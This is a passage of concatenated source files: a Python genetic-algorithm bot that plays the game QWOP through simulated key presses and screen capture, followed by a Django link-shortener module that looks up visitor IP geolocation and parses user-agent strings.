# Bounding box for QWOP
start_x, start_y = 9, 105
end_x, end_y = 640 + start_x, 400 + start_y
frame = (start_x, start_y, end_x, end_y)
# Bounding box for the "metres" dialogue box
metres_start_x, metres_start_y = 170, 24
metres_end_x, metres_end_y = 413, 50
metres_box = (metres_start_x, metres_start_y, metres_end_x, metres_end_y)
# x, y coordinate of the ribbon that pops up when you die
ribbon_x, ribbon_y = 155, 125
ribbon_pixel = (ribbon_x, ribbon_y)
# QWOP codes
QWOP_CODE = {
'P': (False, False, False, False),
'D': (False, False, False, True),
'C': (False, False, True, False),
'J': (False, False, True, True),
'B': (False, True, False, False),
'I': (False, True, False, True),
'H': (False, True, True, False),
'N': (False, True, True, True),
'A': (True, False, False, False),
'G': (True, False, False, True),
'F': (True, False, True, False),
'M': (True, False, True, True),
'E': (True, True, False, False),
'L': (True, True, False, True),
'K': (True, True, True, False),
'O': (True, True, True, True),
None: (False, False, False, False)
}
# Key codes
VK_CODE = {
'SPACE':0x20,
'O':0x4F,
'P':0x50,
'Q':0x51,
'W':0x57
}
def sendKey(key, duration=0.1, up=True):
win32api.keybd_event(key, 0, 0, 0)
time.sleep(duration)
if(up):
win32api.keybd_event(key, 0, win32con.KEYEVENTF_KEYUP, 0)
def leftClick(coords, duration=0.1, up=True):
win32api.SetCursorPos((start_x + coords[0], start_y + coords[1]))
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)
time.sleep(duration)
if (up):
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)
def sendKeys(keys):
"""
Send a list of (key, duration) pairs concurrently
"""
threads = []
for (key, duration, up) in keys:
t = threading.Thread(target=sendKey, args=(VK_CODE[key], duration, up))
threads.append(t)
for thread in threads:
thread.start()
def sendQwopCode(key, next=None):
"""
Send a QWOP-encoded key to the game.
"""
(q, w, o, p) = QWOP_CODE[key]
(_q, _w, _o, _p) = QWOP_CODE[next]
keys = []
if q:
keys.append(('Q', 0.15, True))
if w:
keys.append(('W', 0.15, True))
if o:
keys.append(('O', 0.15, True))
if p:
keys.append(('P', 0.15, True))
# Send the keys
sendKeys(keys)
# wait for them to finish before moving on to the next one
time.sleep(0.15)
def getRandomQwopString(numChars=5):
qwopString = ""
for i in xrange(numChars):
qwopString += chr(randint(65, 80))
return qwopString
class AutoQwopper:
def __init__(self):
self.update()
def getMetres(self):
metres = float(image_to_string(self.metres_frame)[:-9].replace(' ', ''))
self.metres = metres
def update(self):
self.qwop_frame = ImageGrab.grab(frame)
self.metres_frame = self.qwop_frame.crop(metres_box)
self.getMetres()
def die(self):
print('Killing qwopper.')
sendKey(VK_CODE['Q'], duration=1.5)
sendKey(VK_CODE['W'], duration=1.5)
def isDead(self):
return (self.qwop_frame.getpixel(ribbon_pixel) == (255, 255, 0))
def beginGame(self):
leftClick((100, 100))
def restartGame(self):
sendKey(VK_CODE['SPACE'])
def run(self, qwopString):
self.beginGame()
if (self.isDead()):
# restart game if this isn't the first time playing
self.restartGame()
self.update()
self.getMetres()
print ("Evaluating qwop string: " + "".join(qwopString))
start = time.time()
running = True
while running:
for qwopCode, next in zip(qwopString, qwopString[1:] + [None]):
sendQwopCode(qwopCode, next)
self.update()
if (self.isDead()):
running = False
# Set fitness to 0 if crashed
# self.metres = 0
print("Qwopper died")
break
if (time.time() - start > 60):
running = False
print("Time exceeded")
# Do one final update
time.sleep(0.5)
self.update()
break
if (not self.isDead()):
self.die()
print ("Went a total of " + str(self.metres) + " metres before dying.")
time.sleep(2)
return self.metres
# The main GA
def evaluate(ind):
qwopper = AutoQwopper()
return qwopper.run(ind),
def generateGene():
#generate a gene
return chr(randint(65, 80))
def mutate(ind):
#select a random character and randomize it
#mutation as described in google's paper
ind[randint(0, len(ind)-1)] = chr(randint(65, 80))
return ind
toolbox = base.Toolbox()
creator.create("FitnessMax", base.Fitness, weights=(1.0,))
creator.create("Individual", list, fitness = creator.FitnessMax)
toolbox.register("individual", tools.initRepeat, creator.Individual, generateGene, n=IND_SIZE)
toolbox.register("select", tools.selTournament, k=2, tournsize=T_SIZE)
toolbox.register("onePoint", tools.cxOnePoint)
toolbox.register("twoPoint", tools.cxTwoPoint)
toolbox.register("selectBest", tools.selBest, k=selb)
toolbox.register("selectWorst", tools.selWorst, k=selw)
# GENERATE STATISTICS
stats = tools.Statistics(key=lambda ind: ind.fitness.values)
hallOfFame = tools.HallOfFame(1)
logbook = tools.Logbook()
stats.register('max', max)
stats.register('min', min)
stats.register('mean', numpy.mean)
def updateStatistics(population, generation):
hallOfFame.update(population)
record = stats.compile(population)
record['best'] = "".join(hallOfFame[0])
record['generation'] = generation
logbook.record(**record)
pickle.dump(logbook, LB_FILE)
def main():
population = [toolbox.individual() for i in range(POP_SIZE)] #generate population
for i in range(len(population)):
#evaluate populations
population[i].fitness.values = evaluate(population[i])
for i in range(generations):
updateStatistics(population, i)
selected = toolbox.select(population) #select
parent1 = toolbox.clone(selected[0])
parent2 = toolbox.clone(selected[1])
child = toolbox.onePoint(parent1, parent2)[0] #crossover
child = mutate(child)
child.fitness.values = evaluate(child) #evaluate child
population.remove(choice(toolbox.selectWorst(population))) #survivor select
population.append(child) #replacement
def runOne(qwopString):
autoQwopper = AutoQwopper()
autoQwopper.run(qwopString)
if __name__ == '__main__':
if (len(sys.argv) > 1):
print ("Running a single genotype.")
runOne(list(sys.argv[1]))
else:
main()
```
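The `QWOP_CODE` table above encodes each genotype character A-P as a (Q, W, O, P) key combination. The following standalone sketch (hypothetical; no window automation or GA involved) simply decodes a genotype string so the mapping is easy to inspect:
```python
# Hypothetical standalone sketch: decode a QWOP genotype string into the
# (Q, W, O, P) key combination each character encodes, using the same mapping
# as QWOP_CODE above.
QWOP_CODE = {
    'P': (False, False, False, False), 'D': (False, False, False, True),
    'C': (False, False, True, False),  'J': (False, False, True, True),
    'B': (False, True, False, False),  'I': (False, True, False, True),
    'H': (False, True, True, False),   'N': (False, True, True, True),
    'A': (True, False, False, False),  'G': (True, False, False, True),
    'F': (True, False, True, False),   'M': (True, False, True, True),
    'E': (True, True, False, False),   'L': (True, True, False, True),
    'K': (True, True, True, False),    'O': (True, True, True, True),
}


def decode(qwop_string):
    keys = ('Q', 'W', 'O', 'P')
    for ch in qwop_string:
        pressed = [k for k, down in zip(keys, QWOP_CODE[ch]) if down]
        print(ch, '->', '+'.join(pressed) or 'no keys')


decode('EKDAP')   # E -> Q+W, K -> Q+W+O, D -> P, A -> Q, P -> no keys
```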
#### File: autoqwop/src/quickGrab.pyw
```python
import ImageGrab
import Image
import os
import time
start_x, start_y = 9, 105
end_x, end_y = 640 + start_x, 400 + start_y
metres_start_x, metres_start_y = 170, 24
metres_end_x, metres_end_y = 413, 50
def screenGrab():
box = (start_x, start_y, end_x, end_y)
im = ImageGrab.grab(box)
impath = os.getcwd() + '\\qwop\\qwop__' + str(int(time.time())) + '.png'
im.save(impath, 'PNG')
box = (metres_start_x, metres_start_y, metres_end_x, metres_end_y)
metres = im.crop(box)
metres_path = impath[:-4] + '_metres.png'
metres.save(metres_path, 'PNG')
def main():
screenGrab()
if __name__ == '__main__':
main()
``` |
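The script above uses the legacy top-level `ImageGrab`/`Image` imports from PIL under Python 2. As a hedged aside, the same capture with a current Pillow install would look roughly like this (assuming Pillow on Windows or macOS, and that the `qwop/` output directory already exists, as the script itself assumes):
```python
# Hypothetical sketch: the same screen grab using package-style Pillow imports.
import os
import time

from PIL import ImageGrab

start_x, start_y = 9, 105
frame = (start_x, start_y, start_x + 640, start_y + 400)

im = ImageGrab.grab(frame)  # bbox in screen coordinates
impath = os.path.join(os.getcwd(), 'qwop', 'qwop__{}.png'.format(int(time.time())))
im.save(impath, 'PNG')
```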
{
"source": "5parkp1ug/djLinkShortener",
"score": 2
} |
#### File: backend/shortener/ip_info_service.py
```python
import logging
import requests
from django.conf import settings
from user_agents import parse
logger = logging.getLogger(__name__)
class IPGeoInfo:
"""
Handles geo and user-agent info
"""
def __init__(self, ip, user_agent):
self.ip = ip
self.user_agent = user_agent
self.data = None
self.info()
def _fetch_data_from_api(self):
"""Method to get data from IPGepLocation.io(https://ipgeolocation.io/) API"""
params = {
'excludes': 'continent_code,country_code2,country_code3,is_eu,languages,geoname_id',
'apiKey': settings.IP_GEO_LOCATION_API_KEY,
'ip': self.ip
}
url = 'https://api.ipgeolocation.io/ipgeo'
response = requests.get(url, params=params)
if response.status_code == 200:
self.data = response.json()
else:
logger.warning(f'HTTP Get Request Failed: status_code={response.status_code}, response={response.json()}')
self.data = {}
def _parse_user_agent(self):
ua = parse(self.user_agent)
self.data['user_agent'] = {
'ua': ua.__str__(),
'browser_family': ua.browser.family,
'browser_version': ua.browser.version_string,
'os_family': ua.os.family,
'os_version': ua.os.version_string,
'device_family': ua.device.family,
'device_brand': ua.device.brand,
'device_model': ua.device.model,
'is_mobile': ua.is_mobile,
'is_pc': ua.is_pc,
'is_tablet': ua.is_tablet,
'is_touch_capable': ua.is_touch_capable,
'is_bot': ua.is_bot,
}
def info(self):
logger.debug(f'IP: {self.ip} & UA: {self.user_agent}')
self._fetch_data_from_api()
self._parse_user_agent()
return self.data
``` |
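The `_parse_user_agent()` method above relies on the `user_agents` package. A standalone sketch of just that half (no Django settings or ipgeolocation.io API key required; the example UA string is arbitrary) shows the fields it extracts:
```python
# Hypothetical standalone sketch: the user-agent half of IPGeoInfo, using the
# same `user_agents` calls as _parse_user_agent() above.
from user_agents import parse

ua_string = ('Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) '
             'AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1')
ua = parse(ua_string)

print(ua.browser.family, ua.browser.version_string)  # e.g. 'Mobile Safari', '14.0'
print(ua.os.family, ua.os.version_string)            # e.g. 'iOS', '14.0'
print(ua.device.brand, ua.device.model)              # e.g. 'Apple', 'iPhone'
print(ua.is_mobile, ua.is_bot)                       # True, False
```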